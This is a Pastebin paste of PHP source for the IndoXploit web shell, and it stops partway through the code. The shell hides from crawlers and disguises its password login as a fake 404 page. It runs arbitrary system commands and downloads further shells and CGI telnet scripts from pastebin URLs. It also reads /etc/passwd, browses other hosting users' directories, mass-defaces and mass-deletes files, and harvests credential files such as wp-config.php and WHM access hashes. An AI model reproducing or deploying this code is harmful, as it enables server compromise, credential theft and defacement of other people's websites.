Guest User

Untitled

a guest
Sep 10th, 2018
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 96.61 KB | None | 0 0
  1. <?php
  2.  
  3. session_start();
  4. @error_reporting(0);
  5. @set_time_limit(0);
  6.  
  7. if(version_compare(PHP_VERSION, '5.3.0', '<')) {
  8. @set_magic_quotes_runtime(0);
  9. }
  10.  
  11. @clearstatcache();
  12. @ini_set('error_log',NULL);
  13. @ini_set('log_errors',0);
  14. @ini_set('max_execution_time',0);
  15. @ini_set('output_buffering',0);
  16. @ini_set('display_errors', 0);
  17.  
  18. $password = "9f3ed52638be652c4d26e8d715c80c66";
  19.  
  20. $SERVERIP = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];
  21. $FILEPATH = str_replace($_SERVER['DOCUMENT_ROOT'], "", path());
  22.  
  23. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  24. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
  25. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  26. header('HTTP/1.0 404 Not Found');
  27. exit;
  28. }
  29. }
  30.  
  31. function login_shell() {
  32. $random_url = mt_rand(1000000, 247345736453);
  33. $curl = curl_init();
  34. $protocol = 'http://';
  35. if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') { $protocol = 'https://'; }
  36. curl_setopt($curl, CURLOPT_URL, $protocol . $_SERVER['HTTP_HOST'] . '/' . $random_url);
  37. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  38. $server_404 = curl_exec($curl);
  39. $server_404 = str_replace("/{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
  40. $server_404 = str_replace("{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
  41. echo $server_404;
  42. exit;
  43. }
  44. if(@$_GET['this'] == "phpinfo") {
  45. echo phpinfo();
  46. exit();
  47. }
  48. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
  49. if(empty($password) || (isset($_GET['passwd']) && (md5($_GET['passwd']) == $password))) {
  50. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  51. echo "<script>document.location.href = '?'</script>";
  52. } else {
  53. login_shell();
  54. }
  55. }
  56. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  57. @ob_clean();
  58. $file = $_GET['file'];
  59. header('Content-Description: File Transfer');
  60. header('Content-Type: application/octet-stream');
  61. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  62. header('Expires: 0');
  63. header('Cache-Control: must-revalidate');
  64. header('Pragma: public');
  65. header('Content-Length: ' . filesize($file));
  66. readfile($file);
  67. exit;
  68. }
  69.  
  70. if(get_magic_quotes_gpc()) {
  71. function idx_ss($array) {
  72. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  73. }
  74. $_POST = idx_ss($_POST);
  75. }
  76. ?>
  77. <!DOCTYPE HTML>
  78. <html>
  79. <!--
  80. ###############################################################################
  81. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  82. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  83. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
  84. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  85. // Greetz: All Member IndoXploit. & All My Friends.
  86. ###############################################################################
  87. // Special Thanks: Depok Cyber Security | Sanjungan Jiwa | 0x1999
  88. ###############################################################################
  89. -->
  90. <head>
  91. <title>IndoXploit</title>
  92. <meta name='author' content='IndoXploit'>
  93. <meta charset="UTF-8">
  94. <style type='text/css'>
  95. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  96. html {
  97. background: #000000;
  98. color: #ffffff;
  99. font-size: 14px;
  100. width: 100%;
  101. }
  102.  
  103. li {
  104. display: inline;
  105. margin: 5px;
  106. padding: 5px;
  107. }
  108.  
  109. a {
  110. color: #ffffff;
  111. text-decoration: none;
  112. }
  113.  
  114. a:hover {
  115. color: gold;
  116. text-decoration: underline;
  117. }
  118.  
  119. b {
  120. color: gold;
  121. }
  122.  
  123. pre {
  124. font-size: 13px;
  125. }
  126.  
  127. table, th, td {
  128. border-collapse:collapse;
  129. background: transparent;
  130. font-family: 'Ubuntu';
  131. font-size: 13px;
  132. }
  133.  
  134. .table_home, .th_home, .td_home {
  135. border: 1px solid #ffffff;
  136. }
  137.  
  138. .th_home {
  139. color: lime;
  140. }
  141.  
  142. .td_home, .td_home > a {
  143. color: #ffffff;
  144. }
  145.  
  146. .td_home > a:hover {
  147. color: gold;
  148. }
  149.  
  150. th {
  151. padding: 10px;
  152. }
  153.  
  154. tr:hover {
  155. background: #006400;
  156. color: #ffffff;
  157. }
  158.  
  159. input[type=text], input[type=password], .input {
  160. background: transparent;
  161. color: #ffffff;
  162. border: 1px solid #ffffff;
  163. padding: 3px;
  164. font-family: 'Ubuntu';
  165. font-size: 13px;
  166. }
  167.  
  168. input[type=submit] {
  169. padding: 2px;}
  170.  
  171. input[type=submit]:hover {
  172. cursor: pointer;
  173. }
  174.  
  175. input:focus, textarea:focus {
  176. outline: 0;
  177. border-color: #ffffff;
  178. }
  179.  
  180. textarea {
  181. border: 1px solid #ffffff;
  182. width: 100%;
  183. height: 400px;
  184. padding-left: 5px;
  185. margin: 10px auto;
  186. resize: none;
  187. background: transparent;
  188. color: #ffffff;
  189. font-family: 'Ubuntu';
  190. font-size: 13px;
  191. }
  192. iframe {
  193. width: 100%;
  194. min-height: 500px;
  195. }
  196. </style>
  197. </head>
  198. <body>
  199. <?php
  200. function path() {
  201. if(isset($_GET['dir'])) {
  202. $dir = str_replace("\\", "/", $_GET['dir']);
  203. @chdir($dir);
  204. } else {
  205. $dir = str_replace("\\", "/", getcwd());
  206. }
  207. return $dir;
  208. }
  209.  
  210. function color($bold = 1, $colorid = null, $string = null) {
  211. $color = array(
  212. "</font>", # 0 off
  213. "<font color='red'>", # 1 red
  214. "<font color='lime'>", # 2 lime
  215. "<font color='white'>", # 3 white
  216. "<font color='gold'>", # 4 gold
  217. );
  218.  
  219. return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
  220. }
  221.  
  222. function OS() {
  223. return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
  224. }
  225.  
  226. function exe($cmd) {
  227. if(function_exists('system')) {
  228. @ob_start();
  229. @system($cmd);
  230. $buff = @ob_get_contents();
  231. @ob_end_clean();
  232. return $buff;
  233. } elseif(function_exists('exec')) {
  234. @exec($cmd,$results);
  235. $buff = "";
  236. foreach($results as $result) {
  237. $buff .= $result;
  238. } return $buff;
  239. } elseif(function_exists('passthru')) {
  240. @ob_start();
  241. @passthru($cmd);
  242. $buff = @ob_get_contents();
  243. @ob_end_clean();
  244. return $buff;
  245. } elseif(function_exists('shell_exec')) {
  246. $buff = @shell_exec($cmd);
  247. return $buff;
  248. }
  249. }
  250.  
  251. function save($filename, $mode, $file) {
  252. $handle = fopen($filename, $mode);
  253. fwrite($handle, $file);
  254. fclose($handle);
  255. return;
  256. }
  257.  
  258. function getfile($name) {
  259. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name."));
  260. if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");
  261. elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php");
  262. elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx");
  263. elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx");
  264. elseif($name === "LRE") $get = array("https://pastebin.com/raw/PVPfA21i", "makman.php");
  265.  
  266. $fp = fopen($get[1], "w");
  267. $ch = curl_init();
  268. curl_setopt($ch, CURLOPT_URL, $get[0]);
  269. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  270. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  271. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  272. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  273. curl_setopt($ch, CURLOPT_FILE, $fp);
  274. return curl_exec($ch);
  275. curl_close($ch);
  276. fclose($fp);
  277. ob_flush();
  278. flush();
  279. }
  280.  
  281. function usergroup() {
  282. if(!function_exists('posix_getegid')) {
  283. $user['name'] = @get_current_user();
  284. $user['uid'] = @getmyuid();
  285. $user['gid'] = @getmygid();
  286. $user['group'] = "?";
  287. } else {
  288. $user['uid'] = @posix_getpwuid(posix_geteuid());
  289. $user['gid'] = @posix_getgrgid(posix_getegid());
  290. $user['name'] = $user['uid']['name'];
  291. $user['uid'] = $user['uid']['uid'];
  292. $user['group'] = $user['gid']['name'];
  293. $user['gid'] = $user['gid']['gid'];
  294. }
  295. return (object) $user;
  296. }
  297.  
  298. function getuser() {
  299. $fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd"));
  300. while($read = fgets($fopen)) {
  301. preg_match_all('/(.*?):x:/', $read, $getuser);
  302. $user[] = $getuser[1][0];
  303. }
  304. return $user;
  305. }
  306.  
  307. function getdomainname() {
  308. $fopen = fopen("/etc/named.conf", "r");
  309. while($read = fgets($fopen)) {
  310. preg_match_all("#/var/named/(.*?).db#", $read, $getdomain);
  311. $domain[] = $getdomain[1][0];
  312. }
  313. return $domain;
  314. }
  315.  
  316. function hddsize($size) {
  317. if($size >= 1073741824)
  318. return sprintf('%1.2f',$size / 1073741824 ).' GB';
  319. elseif($size >= 1048576)
  320. return sprintf('%1.2f',$size / 1048576 ) .' MB';
  321. elseif($size >= 1024)
  322. return sprintf('%1.2f',$size / 1024 ) .' KB';
  323. else
  324. return $size .' B';
  325. }
  326.  
  327. function hdd() {
  328. $hdd['size'] = hddsize(disk_total_space("/"));
  329. $hdd['free'] = hddsize(disk_free_space("/"));
  330. $hdd['used'] = $hdd['size'] - $hdd['free'];
  331. return (object) $hdd;
  332. }
  333.  
  334. function writeable($path, $perms) {
  335. return (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms);
  336. }
  337.  
  338. function perms($path) {
  339. $perms = fileperms($path);
  340. if (($perms & 0xC000) == 0xC000) {
  341. // Socket
  342. $info = 's';
  343. }
  344. elseif (($perms & 0xA000) == 0xA000) {
  345. // Symbolic Link
  346. $info = 'l';
  347. }
  348. elseif (($perms & 0x8000) == 0x8000) {
  349. // Regular
  350. $info = '-';
  351. }
  352. elseif (($perms & 0x6000) == 0x6000) {
  353. // Block special
  354. $info = 'b';
  355. }
  356. elseif (($perms & 0x4000) == 0x4000) {
  357. // Directory
  358. $info = 'd';
  359. }
  360. elseif (($perms & 0x2000) == 0x2000) {
  361. // Character special
  362. $info = 'c';
  363. }
  364. elseif (($perms & 0x1000) == 0x1000) {
  365. // FIFO pipe
  366. $info = 'p';
  367. }
  368. else {
  369. // Unknown
  370. $info = 'u';
  371. }
  372. // Owner
  373. $info .= (($perms & 0x0100) ? 'r' : '-');
  374. $info .= (($perms & 0x0080) ? 'w' : '-');
  375. $info .= (($perms & 0x0040) ?
  376. (($perms & 0x0800) ? 's' : 'x' ) :
  377. (($perms & 0x0800) ? 'S' : '-'));
  378. // Group
  379. $info .= (($perms & 0x0020) ? 'r' : '-');
  380. $info .= (($perms & 0x0010) ? 'w' : '-');
  381. $info .= (($perms & 0x0008) ?
  382. (($perms & 0x0400) ? 's' : 'x' ) :
  383. (($perms & 0x0400) ? 'S' : '-'));
  384. // World
  385. $info .= (($perms & 0x0004) ? 'r' : '-');
  386. $info .= (($perms & 0x0002) ? 'w' : '-');
  387. $info .= (($perms & 0x0001) ?
  388. (($perms & 0x0200) ? 't' : 'x' ) :
  389. (($perms & 0x0200) ? 'T' : '-'));
  390.  
  391. return $info;
  392. }
  393.  
  394. function lib_installed() {
  395. $lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  396. $lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  397. $lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  398. $lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  399. $lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  400. return implode(" | ", $lib);
  401. }
  402.  
  403. function pwd() {
  404. $dir = explode("/", path());
  405. foreach($dir as $key => $index) {
  406. print "<a href='?dir=";
  407. for($i = 0; $i <= $key; $i++) {
  408. print $dir[$i];
  409. if($i != $key) {
  410. print "/";
  411. }
  412. }
  413. print "'>$index</a>/";
  414. }
  415. print "<br>";
  416. print (OS() === "Windows") ? windisk() : "";
  417. }
  418.  
  419. function windisk() {
  420. $letters = "";
  421. $v = explode("\\", path());
  422. $v = $v[0];
  423. foreach(range("A", "Z") as $letter) {
  424. $bool = $isdiskette = in_array($letter, array("A"));
  425. if(!$bool) $bool = is_dir("$letter:\\");
  426. if($bool) {
  427. $letters .= "[ <a href='?dir=$letter:\\'".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">";
  428. if($letter.":" != $v) {
  429. $letters .= $letter;
  430. }
  431. else {
  432. $letters .= color(1, 2, $letter);
  433. }
  434. $letters .= "</a> ]";
  435. }
  436. }
  437. if(!empty($letters)) {
  438. print "Detected Drives $letters<br>";
  439. }
  440. if(count($quicklaunch) > 0) {
  441. foreach($quicklaunch as $item) {
  442. $v = realpath(path(). "..");
  443. if(empty($v)) {
  444. $a = explode(DIRECTORY_SEPARATOR,path());
  445. unset($a[count($a)-2]);
  446. $v = join(DIRECTORY_SEPARATOR, $a);
  447. }
  448. print "<a href='".$item[1]."'>".$item[0]."</a>";
  449. }
  450. }
  451. }
  452.  
  453. function serverinfo() {
  454. $disable_functions = @ini_get('disable_functions');
  455. $disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");
  456.  
  457. $output[] = "SERVER IP ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(1, 2, $_SERVER['REMOTE_ADDR']);
  458. $output[] = "WEB SERVER : ".color(1, 2, $_SERVER['SERVER_SOFTWARE']);
  459. $output[] = "SYSTEM : ".color(1, 2, php_uname());
  460. $output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")";
  461. $output[] = "HDD : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")";
  462. $output[] = "PHP VERSION : ".color(1, 2, @phpversion());
  463. $output[] = "SAFE MODE : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF"));
  464. $output[] = "DISABLE FUNC: $disable_functions";
  465. $output[] = lib_installed();
  466. $output[] = "Current Dir (".writeable(path(), perms(path())).") ";
  467.  
  468. print "<pre>";
  469. print implode("<br>", $output);
  470. pwd();
  471. print "</pre>";
  472.  
  473. }
  474.  
  475. function curl($url, $post = false, $data = null) {
  476. $ch = curl_init($url);
  477. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  478. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  479. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  480. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  481. curl_setopt($ch, CURLOPT_TIMEOUT, 10);
  482. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  483. if($post) {
  484. curl_setopt($ch, CURLOPT_POST, true);
  485. curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  486. }
  487. return curl_exec($ch);
  488. curl_close($ch);
  489. }
  490.  
  491. function reverse() {
  492. $response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket=");
  493. $response = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response)))))))))))));
  494. $explode = explode(",,", $response);
  495. unset($explode[0]);
  496.  
  497. foreach($explode as $domain) {
  498. $domain = "http://$domain";
  499. $domain = str_replace(",", "", $domain);
  500. $url[] = $domain;
  501. ob_flush();
  502. flush();
  503. }
  504.  
  505. return $url;
  506. }
  507.  
  508. function getValue($param, $kata1, $kata2){
  509. if(strpos($param, $kata1) === FALSE) return FALSE;
  510. if(strpos($param, $kata2) === FALSE) return FALSE;
  511. $start = strpos($param, $kata1) + strlen($kata1);
  512. $end = strpos($param, $kata2, $start);
  513. $return = substr($param, $start, $end - $start);
  514. return $return;
  515. }
  516.  
  517. function massdeface($dir, $file, $filename, $type = null) {
  518. $scandir = scandir($dir);
  519. foreach($scandir as $dir_) {
  520. $path = "$dir/$dir_";
  521. $location = "$path/$filename";
  522. if($dir_ === "." || $dir_ === "..") {
  523. file_put_contents($location, $file);
  524. }
  525. else {
  526. if(is_dir($path) AND is_writable($path)) {
  527. print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."<br>";
  528. file_put_contents($location, $file);
  529. if($type === "-alldir") {
  530. massdeface($path, $file, $filename, "-alldir");
  531. }
  532. }
  533. }
  534. }
  535. }
  536.  
  537. function massdelete($dir, $filename) {
  538. $scandir = scandir($dir);
  539. foreach($scandir as $dir_) {
  540. $path = "$dir/$dir_";
  541. $location = "$path/$filename";
  542. if($dir_ === '.') {
  543. if(file_exists("$dir/$filename")) {
  544. unlink("$dir/$filename");
  545. }
  546. }
  547. elseif($dir_ === '..') {
  548. if(file_exists(dirname($dir)."/$filename")) {
  549. unlink(dirname($dir)."/$filename");
  550. }
  551. }
  552. else {
  553. if(is_dir($path) AND is_writable($path)) {
  554. if(file_exists($location)) {
  555. print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."<br>";
  556. unlink($location);
  557. massdelete($path, $filename);
  558. }
  559. }
  560. }
  561. }
  562. }
  563.  
  564. function tools($toolsname, $args = null) {
  565. if($toolsname === "cmd") {
  566. print "<form method='post' action='?do=cmd&dir=".path()."' style='margin-top: 15px;'>
  567. ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $
  568. <input style='border: none; border-bottom: 1px solid #ffffff;' type='text' name='cmd' required>
  569. <input style='border: none; border-bottom: 1px solid #ffffff;' class='input' type='submit' value='>>'>
  570. </form>";
  571. }
  572. elseif($toolsname === "readfile") {
  573. if(empty($args)) die(color(1, 1, $msg));
  574. if(!is_file($args)) die(color(1, 1, "File '$args' is not exists."));
  575.  
  576. print "<pre>";
  577. print htmlspecialchars(file_get_contents($args));
  578. print "</pre>";
  579. }
  580. elseif($toolsname === "spawn") {
  581. if($args === "adminer") {
  582. if(file_exists("adminer.php")) {
  583. print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
  584. }
  585. else {
  586. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'."));
  587. if(getfile("adminer")) {
  588. print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
  589. }
  590. else {
  591. print color(1, 1, "Error while downloading file Adminer.");
  592. @unlink("adminer.php");
  593. }
  594. }
  595. }
  596. elseif($args === "webconsole") {
  597. if(file_exists("webconsole.php")) {
  598. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
  599. }
  600. else {
  601. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'."));
  602. if(getfile("webconsole")) {
  603. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
  604. }
  605. else {
  606. print color(1, 1, "Error while downloading file WebConsole.");
  607. @unlink("webconsole.php");
  608. }
  609. }
  610. }
  611. elseif($args === "cgitelnet1") {
  612. if(file_exists("idx_cgi/cgitelnet1.idx")) {
  613. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
  614. }
  615. elseif(file_exists('cgitelnet1.idx')) {
  616. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
  617. }
  618. else {
  619. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
  620. if(!is_dir(path()."/idx_cgi/")) {
  621. @mkdir('idx_cgi', 0755);
  622. save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
  623. }
  624. if(getfile("cgitelnet1")) {
  625. chmod('idx_cgi/cgitelnet1.idx', 0755);
  626. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
  627. }
  628. else {
  629. print color(1, 1, "Error while downloading file CGI Telnet.");
  630. @rmdir(path()."/idx_cgi/");
  631. if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
  632. if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
  633. }
  634. }
  635.  
  636. }
  637. elseif($args === "cgitelnet2") {
  638. if(file_exists("idx_cgi/cgitelnet2.idx")) {
  639. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
  640. }
  641. elseif(file_exists('cgitelnet2.idx')) {
  642. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet2.idx' frameborder='0' scrolling='no'></iframe>";
  643. }
  644. else {
  645. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
  646. if(!is_dir(path()."/idx_cgi/")) {
  647. @mkdir('idx_cgi', 0755);
  648. save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
  649. }
  650. if(getfile("cgitelnet2")) {
  651. chmod('idx_cgi/cgitelnet2.idx', 0755);
  652. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
  653. }
  654. else {
  655. print color(1, 1, "Error while downloading file CGI Telnet.");
  656. @rmdir(path()."/idx_cgi/");
  657. if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
  658. if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
  659. }
  660. }
  661.  
  662. }
  663. elseif($args === "phpinfo") {
  664. if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) {
  665. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
  666. }
  667. else {
  668. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'phpinfo'."));
  669. save("phpinfo.php", "w", "<?php print '<html><style>html,body {background: #000000;}</style><div style=\'background: #000000; color: #cccccc;\'>'; phpinfo(); print '</div></html>'; ?>");
  670. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
  671. }
  672. }
  673. }
  674. elseif($toolsname === "upload") {
  675. if($_POST['upload']) {
  676. if($_POST['uploadtype'] === '1') {
  677. if(@copy($_FILES['file']['tmp_name'], path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."")) {
  678. $act = color(1, 2, "Uploaded!")." at <i><b>".path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."</b></i>";
  679. }
  680. else {
  681. $act = color(1, 1, "Failed to upload file!");
  682. }
  683. }
  684. elseif($_POST['uploadtype'] === '2') {
  685. $root = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
  686. $web = $_SERVER['HTTP_HOST'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
  687. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  688. if(@copy($_FILES['file']['tmp_name'], $root)) {
  689. $act = color(1, 2, "Uploaded!")." at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  690. }
  691. else {
  692. $act = color(1, 1, "Failed to upload file!");
  693. }
  694. }
  695. else {
  696. $act = color(1, 1, "Failed to upload file!");
  697. }
  698. }
  699. }
  700. print "Upload File: $act
  701. <form method='post' enctype='multipart/form-data'>
  702. <input type='radio' name='uploadtype' value='1' checked>current_dir [ ".writeable(path(), "Writeable")." ]
  703. <input type='radio' name='uploadtype' value='2'>document_root [ ".writeable($_SERVER['DOCUMENT_ROOT'], "Writeable")." ]<br>
  704. <input type='file' name='file'>
  705. <input type='submit' value='upload' name='upload'>
  706. </form>";
  707. }
  708. elseif($toolsname === "jumping") {
  709. $i = 0;
  710. foreach(getuser() as $user) {
  711. $path = "/home/$user/public_html";
  712. if(is_readable($path)) {
  713. $status = color(1, 2, "[R]");
  714. if(is_writable($path)) {
  715. $status = color(1, 2, "[RW]");
  716. }
  717. $i++;
  718. print "$status <a href='?dir=$path'>".color(1, 4, $path)."</a>";
  719. if(!function_exists('posix_getpwuid')) print "<br>";
  720. if(!getdomainname()) print " => ".color(1, 1, "Can't get domain name")."<br>";
  721. foreach(getdomainname() as $domain) {
  722. $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
  723. $userdomain = $userdomain->name;
  724. if($userdomain === $user) {
  725. print " => <a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
  726. break;
  727. }
  728. }
  729. }
  730. }
  731. print ($i === 0) ? "" : "<p>".color(1, 3, "Total ada $i kamar di ".$GLOBALS['SERVERIP'])."</p>";
  732. }
  733. elseif($toolsname === "idxconfig") {
  734. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_config'."));
  735. if(!is_dir(path()."/idx_config/")) {
  736. @mkdir('idx_config', 0755);
  737. $htaccess = "Options all\nDirectoryIndex indoxploit.htm\nSatisfy Any";
  738. save("idx_config/.htaccess","w", $htaccess);
  739.  
  740. foreach(getuser() as $user) {
  741. $user_docroot = "/home/$user/public_html/";
  742. if(is_readable($user_docroot)) {
  743. $getconfig = array(
  744. "/home/$user/.accesshash" => "WHM-accesshash",
  745. "$user_docroot/config/koneksi.php" => "Lokomedia",
  746. "$user_docroot/forum/config.php" => "phpBB",
  747. "$user_docroot/sites/default/settings.php" => "Drupal",
  748. "$user_docroot/config/settings.inc.php" => "PrestaShop",
  749. "$user_docroot/app/etc/local.xml" => "Magento",
  750. "$user_docroot/admin/config.php" => "OpenCart",
  751. "$user_docroot/application/config/database.php" => "Ellislab",
  752. "$user_docroot/vb/includes/config.php" => "Vbulletin",
  753. "$user_docroot/includes/config.php" => "Vbulletin",
  754. "$user_docroot/forum/includes/config.php" => "Vbulletin",
  755. "$user_docroot/forums/includes/config.php" => "Vbulletin",
  756. "$user_docroot/cc/includes/config.php" => "Vbulletin",
  757. "$user_docroot/inc/config.php" => "MyBB",
  758. "$user_docroot/includes/configure.php" => "OsCommerce",
  759. "$user_docroot/shop/includes/configure.php" => "OsCommerce",
  760. "$user_docroot/os/includes/configure.php" => "OsCommerce",
  761. "$user_docroot/oscom/includes/configure.php" => "OsCommerce",
  762. "$user_docroot/products/includes/configure.php" => "OsCommerce",
  763. "$user_docroot/cart/includes/configure.php" => "OsCommerce",
  764. "$user_docroot/inc/conf_global.php" => "IPB",
  765. "$user_docroot/wp-config.php" => "Wordpress",
  766. "$user_docroot/wp/test/wp-config.php" => "Wordpress",
  767. "$user_docroot/blog/wp-config.php" => "Wordpress",
  768. "$user_docroot/beta/wp-config.php" => "Wordpress",
  769. "$user_docroot/portal/wp-config.php" => "Wordpress",
  770. "$user_docroot/site/wp-config.php" => "Wordpress",
  771. "$user_docroot/wp/wp-config.php" => "Wordpress",
  772. "$user_docroot/WP/wp-config.php" => "Wordpress",
  773. "$user_docroot/news/wp-config.php" => "Wordpress",
  774. "$user_docroot/wordpress/wp-config.php" => "Wordpress",
  775. "$user_docroot/test/wp-config.php" => "Wordpress",
  776. "$user_docroot/demo/wp-config.php" => "Wordpress",
  777. "$user_docroot/home/wp-config.php" => "Wordpress",
  778. "$user_docroot/v1/wp-config.php" => "Wordpress",
  779. "$user_docroot/v2/wp-config.php" => "Wordpress",
  780. "$user_docroot/press/wp-config.php" => "Wordpress",
  781. "$user_docroot/new/wp-config.php" => "Wordpress",
